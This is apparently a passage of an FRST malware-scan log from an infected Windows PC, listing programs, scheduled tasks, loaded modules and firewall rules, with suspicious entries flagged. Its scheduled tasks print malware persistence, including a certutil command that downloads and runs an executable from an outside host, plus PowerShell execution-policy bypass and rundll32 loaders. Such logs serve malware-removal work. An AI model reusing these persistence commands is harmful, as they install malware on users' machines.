Microsoft Visual C++ 2017 Redistributable (x64) - 14.12.25810 (HKLM-x32\...\{e2ee15e2-a480-4bc5-bfb7-e9803d1d9823}) (Version: 14.12.25810.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.12.25810 (HKLM-x32\...\{56e11d69-7cc9-40a5-a4f9-8f6190c4d84d}) (Version: 14.12.25810.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\{FD9D64F4-CAF5-3D23-845A-B843C78CC1A5}) (Version: 10.0.60830 - Microsoft Corporation)
Microsoft Visual Studio 2017 (HKLM\...\{6F320B93-EE3C-4826-85E0-ADF79F8D4C61}) (Version: 1.11.33288.831 - Microsoft Corporation)
NVIDIA PhysX (HKLM-x32\...\{80407BA7-7763-4395-AB98-5233F1B34E65}) (Version: 9.13.1220 - NVIDIA Corporation)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.14393.31233 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8036 - Realtek Semiconductor Corp.)
RevServicesX (HKLM\...\{4A0D29CD-7A99-4F5F-B81B-115A5BB25EC4}) (Version: 4.0.8 - SystemaRev) Hidden
SafeFinder (HKLM-x32\...\{F0628398-C899-40E1-8797-66E777CE426E}) (Version: 1.0.0.0 - Linkury) <==== ATTENTION
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1258 - SUPERAntiSpyware.com)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.4.3.38 - Synaptics Incorporated)
System Healer (HKLM-x32\...\SystemHealer_is1) (Version: 4.4.0.3 - System Healer) <==== ATTENTION
System Table (HKLM-x32\...\System Table_is1) (Version:  - )
vs_filehandler_x86 (HKLM-x32\...\{2512A3CE-E1E4-46D5-8B40-28DA3AE2261E}) (Version: 15.0.26711 - Microsoft Corporation) Hidden
WhatsApp (HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\WhatsApp) (Version: 0.2.8082 - WhatsApp)
Windows 10 Update Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22243 - Microsoft Corporation)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-3764278317-3264620232-1554668131-1000_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-674557A57A45}\InprocServer32 -> %%systemroot%%\system32\shell32.dll => No File
CustomCLSID: HKU\S-1-5-21-3764278317-3264620232-1554668131-1000_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => C:\Windows\system32\mcicda64.dll [2018-03-24] ()
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ContextMenuHandlers1: [DaemonShellExtImage] -> {40966797-8FFE-46C8-9EF8-7003F33CCF0F} => C:\Program Files\DAEMON Tools Pro\DTShl64.dll [2015-02-27] (Disc Soft Ltd)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers2: [DaemonShellExtDrive] -> {A5415364-784A-41A5-B47A-D452909CA8FF} => C:\Program Files\DAEMON Tools Pro\DTShl64.dll [2015-02-27] (Disc Soft Ltd)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\WINDOWS\system32\igfxpph.dll [2017-03-09] (Intel Corporation)
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (Alexander Roshal)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {01D9EDD4-77AD-4C51-9D1A-3EC9D083ABCE} - System32\Tasks\AdobeAAMUpdater-1.0-Craciun-PC-Craciun => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2018-04-11] (Adobe Systems Incorporated)
Task: {0923B1D5-5289-4086-B6C1-05EA777A9FAF} - System32\Tasks\PPI Update => C:\WINDOWS\explorer.exe "hxxp://windowsdefender.club/warning/download.php?mn=5623" <==== ATTENTION
Task: {13F87C8D-A939-4C45-8A2B-2751C282103A} - System32\Tasks\FastDataX Task => C:\PROGRA~2\FASTDA~1\FASTDA~1.EXE
Task: {152213FB-1763-4578-939F-96F55DAF1B52} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [2017-04-12] (TODO: <Company name>)
Task: {25C98ADD-977F-481F-AA9A-5F7CAC3644B6} - System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3764278317-3264620232-1554668131-1000 => C:\Users\Craciun\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
Task: {288CC830-3E4C-4037-BDC8-35E039375BF6} - System32\Tasks\Microsoft\Windows\Multimedia\Driver => C:\WINDOWS\SysWOW64\Easeware.Driver.exe
Task: {3056F5F7-CDDE-4137-81F5-E8FECAFA2587} - System32\Tasks\System Healer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe <==== ATTENTION
Task: {403A1486-CE91-405F-86A1-FB619623A282} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {487438D3-5615-4384-9D48-75653859EDE2} - System32\Tasks\MainPMgr => powershell -ExecutionPolicy ByPass -File pm.ps1
Task: {60BBADAD-8EB7-473A-9F3B-2BBB58D3074C} - System32\Tasks\Update_4.0.8 => C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64x.exe [2018-06-08] (SystemaRev)
Task: {65B85F6F-35B3-4459-A179-28255D5B7B25} - System32\Tasks\Microsoft\Windows\HelloFace\FODCleanupTask => C:\Windows\System32\WinBioPlugIns\FaceFodUninstaller.exe [2018-04-12] ()
Task: {67D63B0D-2100-47AA-ADAC-128A2EE06F2D} - System32\Tasks\CreateExplorerShellUnelevatedTask => C:\Windows\explorer.exe /NOUACCHECK
Task: {6C2D1D6F-053C-4C3F-9322-B2A9AF69C995} - System32\Tasks\MaxiBuy2 => C:\Users\Craciun\AppData\Roaming\MaxiBuy\python\pythonw.exe [2018-05-02] (Python Software Foundation) <==== ATTENTION
Task: {70D00A8B-5188-4F87-8EA1-40E1C57E5F70} - System32\Tasks\jgvcz => C:\Users\Craciun\AppData\Roaming\dwirn\jgvcz.vbs [2018-05-24] ()
Task: {7E4C147E-5FA5-4A30-92BC-18492B1793A3} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {816FCA72-D908-4E68-B8F9-E1A56A1ABFA7} - System32\Tasks\Driver Booster Scheduler => C:\Program Files (x86)\IObit\Driver Booster\4.4.0\Scheduler.exe
Task: {87951E4F-1C85-472A-944C-7924D58BCDCF} - System32\Tasks\Driver Booster SkipUAC (Craciun) => C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DriverBooster.exe
Task: {8FBCC9C9-B649-4F2E-8354-DDF8A6D760DA} - System32\Tasks\update-S-1-5-21-3764278317-3264620232-1554668131-1000 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [2017-04-12] (TODO: <Company name>)
Task: {90F1558A-91F4-432C-87AB-C6AE84752474} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-05-24] () <==== ATTENTION
Task: {9D47BE01-7439-44C5-A803-17C31E4D30C4} - System32\Tasks\LangaCount => C:\Windows\system32\rundll32.exe "C:\Program Files\LangaCount\LangaCount.dll",rGVKtdcST <==== ATTENTION
Task: {9E72FCD0-A4C6-47F4-983F-CAF9E4F95A89} - System32\Tasks\AdobeGCInvoker-1.0-ALEX-PC-Craciun => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2018-05-11] (Adobe Systems, Incorporated)
Task: {A40406E5-7865-4FDA-81C3-828FDEEB4BB5} - System32\Tasks\Acronis Bar Analyptian => C:\WINDOWS\system32\rundll32.exe "C:\Program Files\Acronis Bar Analyptian\Acronis Bar Analyptian.dll",QObEek <==== ATTENTION
Task: {C73C8501-C303-477E-9ADE-DA0783F4EDA0} - System32\Tasks\Microsoft\Windows\Windows Error Reporting\ErrorReporting => C:\\ProgramData\\WindowsErrorReporting\\wvermgr.exe
Task: {C863AAFF-BB8A-4BF4-9F92-33BA340FCAD7} - System32\Tasks\MRT => C:\Users\Craciun\AppData\Local\Temp\csrss\mrt.exe [2018-05-29] () <==== ATTENTION
Task: {D8FB4047-93CB-48C5-BE79-6E0A154183CB} - System32\Tasks\Sawmenger XP => C:\Windows\system32\rundll32.exe "C:\Program Files\Sawmenger XP\Sawmenger XP.dll",elnXHi <==== ATTENTION
Task: {DB16C6BB-4AC0-4115-BB1A-CB5F96B282D1} - System32\Tasks\UMonitor Task => C:\WINDOWS\SysWOW64\UMonit64.exe
Task: {DC995D24-AF05-4676-9569-D8937E7A3B56} - System32\Tasks\MaxiBuy => C:\Users\Craciun\AppData\Roaming\MaxiBuy\python\pythonw.exe [2018-05-02] (Python Software Foundation) <==== ATTENTION
Task: {E0F84829-311B-4C78-8B0B-2577CDA5A5D2} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/4/app.exe C:\Users\Craciun\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Craciun\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {E8E55E52-A1B5-4A05-B29D-A8B42110978C} - System32\Tasks\Microsoft\Windows\Setup\Notifier => C:\Windows\system32\Notifier.exe
Task: {FB0096CE-D508-407F-9E4D-42A6BCEB854B} - System32\Tasks\S-1-5-21-3764278317-3264620232-1554668131-1000\DataSenseLiveTileTask => C:\Windows\System32\DataUsageLiveTileTask.exe [2018-04-12] (Microsoft Corporation)
Task: {FEEBF35B-0CD7-4809-B968-5454F7A01DCC} - System32\Tasks\System Healer Delayed => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\update-S-1-5-21-3764278317-3264620232-1554668131-1000.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
Task: C:\Windows\Tasks\update-sys.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
 
Shortcut: C:\Users\Craciun\Favorites\Fotor for desktop.lnk -> hxxp://www.fotor.com/windows/review.htm
Shortcut: C:\Users\Craciun\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Вoйти в Интeрнeт.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) <==== Cyrillic
 
ShortcutWithArgument: C:\Users\Craciun\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\Craciun\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP%
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP%
 
==================== Loaded Modules (Whitelisted) ==============
 
2018-06-07 20:17 - 2015-06-01 01:41 - 004997120 _____ () C:\Program Files\Sawmenger XP\Sawmenger XP.dll
2018-04-12 02:34 - 2018-04-12 02:34 - 000491744 _____ () C:\Windows\System32\InputHost.dll
2017-09-26 02:52 - 2017-09-26 02:52 - 000491600 _____ () C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll
2018-04-12 02:34 - 2018-04-12 02:34 - 000472064 _____ () C:\Windows\ShellExperiences\TileControl.dll
2018-04-12 02:34 - 2018-04-12 02:34 - 002759168 _____ () C:\Windows\ShellComponents\TaskFlowUI.dll
2018-06-11 20:25 - 2018-06-11 20:26 - 000452608 _____ () C:\Users\Craciun\AppData\Local\Temp\UCF4SO8U9O\UCF4.exe
2018-06-11 20:26 - 2018-06-11 20:26 - 000757760 _____ () C:\Users\Craciun\AppData\Local\Temp\UCF4SO8U9O\T9XH.exe
2018-05-24 11:33 - 2018-05-24 11:33 - 003913112 _____ () C:\Windows\SystemApps\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\ContentDeliveryManager.Background.dll
2018-05-24 08:33 - 2018-05-24 08:33 - 001535488 _____ () C:\Program Files (x86)\Google\Chrome\Application\WINHTTP.dll
2018-05-26 14:23 - 2018-05-26 14:23 - 000342528 _____ () C:\ProgramData\Subair\Trusttansoft.dll
2018-05-16 08:31 - 2018-05-15 06:13 - 004443992 _____ () C:\Program Files (x86)\Google\Chrome\Application\66.0.3359.181\libglesv2.dll
2018-05-16 08:31 - 2018-05-15 06:13 - 000099672 _____ () C:\Program Files (x86)\Google\Chrome\Application\66.0.3359.181\libegl.dll
2017-03-09 11:16 - 2017-03-09 11:16 - 000112264 _____ () C:\Windows\System32\IccLibDll_x64.dll
2018-05-24 08:33 - 2018-05-24 08:33 - 000585216 _____ () c:\users\craciun\appdata\local\xservice\xservice.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE trusted site: HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\hola.org -> hxxp://hola.org
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2017-09-29 16:46 - 2018-05-26 21:03 - 000009752 _____ C:\Windows\system32\Drivers\etc\hosts
 
There are 228 more lines.
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Craciun\Pictures\poze sau clipuri lu alex\Inu x Boku SS.jpg
DNS Servers: 192.168.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Warn)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [{AAAE6B21-814D-4A35-959A-82EB2DF6D010}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [UDP Query User{37813A4E-E185-4CE0-B1E1-CBCFBF6F75A1}C:\users\craciun\appdata\roaming\utorrent\updates\3.5.3_44358.exe] => (Block) C:\users\craciun\appdata\roaming\utorrent\updates\3.5.3_44358.exe
FirewallRules: [TCP Query User{599B3059-239A-4DA6-B424-152E69EE5F76}C:\users\craciun\appdata\roaming\utorrent\updates\3.5.3_44358.exe] => (Block) C:\users\craciun\appdata\roaming\utorrent\updates\3.5.3_44358.exe
FirewallRules: [UDP Query User{971D7BB3-3B08-4DEC-8DD2-DEC7564607A7}C:\counter-strike 1.6\hl.exe] => (Block) C:\counter-strike 1.6\hl.exe
FirewallRules: [TCP Query User{D3827DA6-B464-4A60-A486-553A790E7169}C:\counter-strike 1.6\hl.exe] => (Block) C:\counter-strike 1.6\hl.exe
FirewallRules: [UDP Query User{C8C1F310-8342-49EA-96DD-C07D13FBB72C}C:\users\craciun\appdata\roaming\utorrent\updates\3.5.1_44332.exe] => (Block) C:\users\craciun\appdata\roaming\utorrent\updates\3.5.1_44332.exe
FirewallRules: [TCP Query User{3228BF12-AFA1-4887-9374-2E3881889F12}C:\users\craciun\appdata\roaming\utorrent\updates\3.5.1_44332.exe] => (Block) C:\users\craciun\appdata\roaming\utorrent\updates\3.5.1_44332.exe
FirewallRules: [{A470BE7A-9786-4029-92E9-D2486B3436BC}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{EAE5D2C0-A1B5-43CB-9869-FE1AFD08251F}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{A60D81C9-0E30-4408-B849-D94F96967EBA}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{A2F9172F-70F5-427D-9D63-871D721DAF73}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{A72D3FEB-16D2-441F-861C-B2D4860D997F}] => (Allow) C:\Users\Craciun\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{5F210438-82E6-473E-9308-1EAF6A74B3A4}] => (Allow) C:\Users\Craciun\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{AD2D26E5-9037-44D9-AFAC-AA6735C8E3CF}] => (Allow) C:\Users\Craciun\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{F84086F5-A753-4637-938F-6553607CDDB5}] => (Allow) C:\Users\Craciun\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{C1F29FC0-E1D0-4EBF-836A-CCB2F472FBFC}] => (Allow) C:\Users\Craciun\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{27307231-490C-404F-9E3E-73239D7388C2}] => (Allow) C:\Users\Craciun\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [TCP Query User{AF4CF425-9CD2-4FCE-97C5-7E51CF88DA93}D:\counter-strike16\hl.exe] => (Allow) D:\counter-strike16\hl.exe
FirewallRules: [UDP Query User{365C2508-EBF2-4740-9783-F938B941C519}D:\counter-strike16\hl.exe] => (Allow) D:\counter-strike16\hl.exe
FirewallRules: [TCP Query User{68235CE2-75A1-4390-8015-F1289E2ACD3A}D:\counter-strike16\counter-strike\hl.exe] => (Allow) D:\counter-strike16\counter-strike\hl.exe
FirewallRules: [UDP Query User{A8C6988A-3190-47FB-B6C0-B28442B1958E}D:\counter-strike16\counter-strike\hl.exe] => (Allow) D:\counter-strike16\counter-strike\hl.exe
FirewallRules: [TCP Query User{C593852D-DDC4-4DD2-B178-BDC998E67E96}D:\counter-strike 1.6 omonas\hl.exe] => (Allow) D:\counter-strike 1.6 omonas\hl.exe
FirewallRules: [UDP Query User{4B707B32-DC1E-4DBA-BA12-8BDE94DD60FD}D:\counter-strike 1.6 omonas\hl.exe] => (Allow) D:\counter-strike 1.6 omonas\hl.exe
FirewallRules: [{D069E836-26E2-4CC1-B0E6-2359E7E53BED}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DriverBooster.exe
FirewallRules: [{F07B5C9B-C169-46F3-A253-54AD6FC3C6E4}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DriverBooster.exe
FirewallRules: [{9BD55B4C-62B6-4CEA-AE3E-B5D658D84E66}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DBDownloader.exe
FirewallRules: [{DCB08F83-E818-421C-98EF-F76E8744C251}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DBDownloader.exe
FirewallRules: [{5DB67347-466D-476E-8102-01C6EB0C18C6}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\AutoUpdate.exe
FirewallRules: [{51BD13BC-4468-4C3F-8909-53DEA96DF390}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\AutoUpdate.exe
FirewallRules: [TCP Query User{3000EB73-C090-4700-88DC-50DEC356E7FB}C:\program files (x86)\java\1.8.0_25\bin\javaw.exe] => (Allow) C:\program files (x86)\java\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{3314993A-2F98-498C-9B2C-A1BFE558ECD6}C:\program files (x86)\java\1.8.0_25\bin\javaw.exe] => (Allow) C:\program files (x86)\java\1.8.0_25\bin\javaw.exe
FirewallRules: [{88CE8C24-9032-4C5A-B77F-DCF3E47C44FB}] => (Block) LPort=445
FirewallRules: [{4A78A676-78CC-4588-A03A-B7F63E933B6B}] => (Block) LPort=445
FirewallRules: [TCP Query User{3E1455F6-29AC-45E2-B810-2C5CD6BA67EB}D:\counter-strike\hl.exe] => (Allow) D:\counter-strike\hl.exe
FirewallRules: [UDP Query User{D0943193-3AFE-4505-966A-3910B8E37409}D:\counter-strike\hl.exe] => (Allow) D:\counter-strike\hl.exe
FirewallRules: [{9165DCB3-434B-4BEB-AAFE-C593CEB8461E}] => (Allow) C:\Program Files (x86)\UnHackMe\Unhackme.exe
FirewallRules: [{B12882B0-998C-495C-B88B-216094E4AB63}] => (Allow) C:\Program Files (x86)\UnHackMe\Unhackme.exe
FirewallRules: [{16C33D5A-304E-4107-B629-C6482B24B2E6}] => (Allow) C:\Program Files (x86)\New Steam\Steam.exe
FirewallRules: [{07E643FE-78E6-473E-B874-499C069DF0BB}] => (Allow) C:\Program Files (x86)\New Steam\Steam.exe
FirewallRules: [{E1B50FB6-73C2-4658-8C8A-869C9D369C1B}] => (Allow) C:\Program Files (x86)\New Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{31DC38C4-E860-4BBE-98CB-D9ECA480D5AB}] => (Allow) C:\Program Files (x86)\New Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [TCP Query User{A32C266E-F4B9-4F8F-8957-DDDFBA640581}D:\warzone\counter strike source warzone\hl2.exe] => (Allow) D:\warzone\counter strike source warzone\hl2.exe
FirewallRules: [UDP Query User{C19EC73A-9A3A-4470-BB6E-A7B7202BC898}D:\warzone\counter strike source warzone\hl2.exe] => (Allow) D:\warzone\counter strike source warzone\hl2.exe
FirewallRules: [TCP Query User{5DC8D3B3-1495-4E6B-8126-7D3F363E13BC}D:\counter strike 1.6\hl.exe] => (Allow) D:\counter strike 1.6\hl.exe
FirewallRules: [UDP Query User{F8AC1DFC-EC72-40FE-A699-DFA7AE480C50}D:\counter strike 1.6\hl.exe] => (Allow) D:\counter strike 1.6\hl.exe
FirewallRules: [{56FACAB1-197E-438C-A897-F2D3D3F2B3D6}] => (Allow) C:\Program Files (x86)\Cracked Steam\steam.exe
FirewallRules: [{AF4C0982-861F-44B1-9079-6CFB92DDB08A}] => (Allow) C:\Program Files (x86)\Cracked Steam\steam.exe
FirewallRules: [TCP Query User{26FB80E2-22E4-4751-8DD3-4ACB6BAC16F6}D:\counter-strike 1.6\hl.exe] => (Allow) D:\counter-strike 1.6\hl.exe
FirewallRules: [UDP Query User{12A70A96-FE45-4E0E-BFA8-808BA49CACE6}D:\counter-strike 1.6\hl.exe] => (Allow) D:\counter-strike 1.6\hl.exe
FirewallRules: [TCP Query User{D5CB2434-3031-4F1C-A2C2-E85C30DF4289}D:\counter-strike-1.9\hl.exe] => (Allow) D:\counter-strike-1.9\hl.exe
FirewallRules: [UDP Query User{4A2BF466-63E3-4372-A5F6-9AEFC5C6EC69}D:\counter-strike-1.9\hl.exe] => (Allow) D:\counter-strike-1.9\hl.exe
FirewallRules: [TCP Query User{E611AC8A-F993-4744-927E-7F3E70135B0C}D:\csgo warzone\csgo.exe] => (Allow) D:\csgo warzone\csgo.exe
FirewallRules: [UDP Query User{1FB75818-EB94-4EA0-9062-F9140E65FBC1}D:\csgo warzone\csgo.exe] => (Allow) D:\csgo warzone\csgo.exe
FirewallRules: [TCP Query User{BBACC947-49D3-4397-84B0-6AA018E31C6C}D:\strogino cs portal\counter-strike global offensive\csgo.exe] => (Allow) D:\strogino cs portal\counter-strike global offensive\csgo.exe
FirewallRules: [UDP Query User{FBEF990D-0679-4581-8188-EAB7F466F313}D:\strogino cs portal\counter-strike global offensive\csgo.exe] => (Allow) D:\strogino cs portal\counter-strike global offensive\csgo.exe
FirewallRules: [TCP Query User{C6999F39-0EF4-4DD4-86F8-51EFA213E179}D:\strogino cs portal\counter-strike source\hl2.exe] => (Allow) D:\strogino cs portal\counter-strike source\hl2.exe
FirewallRules: [UDP Query User{9BAA31E3-1E92-4EDC-BBE1-A3AC98A9EF87}D:\strogino cs portal\counter-strike source\hl2.exe] => (Allow) D:\strogino cs portal\counter-strike source\hl2.exe
FirewallRules: [TCP Query User{E9ED3ACC-3FF7-4706-99CE-86DD4480667B}D:\counter strike steam update\hl.exe] => (Allow) D:\counter strike steam update\hl.exe
FirewallRules: [UDP Query User{E2874894-1DD9-4F86-9533-39EF959B3141}D:\counter strike steam update\hl.exe] => (Allow) D:\counter strike steam update\hl.exe
FirewallRules: [TCP Query User{307A61AD-59E5-471E-97D3-56FC425C0233}D:\counter strike steam update\hlds.exe] => (Allow) D:\counter strike steam update\hlds.exe
FirewallRules: [UDP Query User{1BA87FE2-433E-45BC-B3F8-7EF72455A2E2}D:\counter strike steam update\hlds.exe] => (Allow) D:\counter strike steam update\hlds.exe
FirewallRules: [{27AC7942-AD31-48D7-8072-1384F615EC37}] => (Allow) 㩃啜敳獲䍜慲楣湵䅜灰慄慴剜慯業杮獜湳獜湳攮數
FirewallRules: [{C70C1CD3-BAAC-4591-BB7A-28ED2A71746B}] => (Allow) 㩃啜敳獲䍜慲楣湵䅜灰慄慴剜慯業杮獜湳獜癡略⹰硥e
FirewallRules: [{A3E9DB0D-9DD6-425D-BC59-0EA67E759486}] => (Allow) C:\WINDOWS\system32\rundll32.exe
FirewallRules: [{D3E6937A-5544-4CE5-983F-0A8534FD6FCC}] => (Allow) C:\Program Files (x86)\Driver Updater Plus\dup.exe
FirewallRules: [{46FCC938-B327-47E3-841A-313A3BB5AA11}] => (Allow) C:\Program Files (x86)\UnHackMe\GWebUpdate.exe
FirewallRules: [{EA9FACF3-2663-4FB1-B977-F30E04C7FD32}] => (Allow) C:\Program Files (x86)\UnHackMe\GWebUpdate.exe
FirewallRules: [{9C818E4A-C31C-41D4-A957-658B7CEDC13A}] => (Allow) D:\SteamLibrary\steamapps\common\Team Fortress 2\hl2.exe
FirewallRules: [{126F6125-15C6-4FA2-8295-0C42C949BF89}] => (Allow) D:\SteamLibrary\steamapps\common\Team Fortress 2\hl2.exe
FirewallRules: [TCP Query User{3275F799-057B-4AB3-B5A1-05C86B05D63A}D:\counter-strike 1.6 (2017-06-27)\hl.exe] => (Allow) D:\counter-strike 1.6 (2017-06-27)\hl.exe
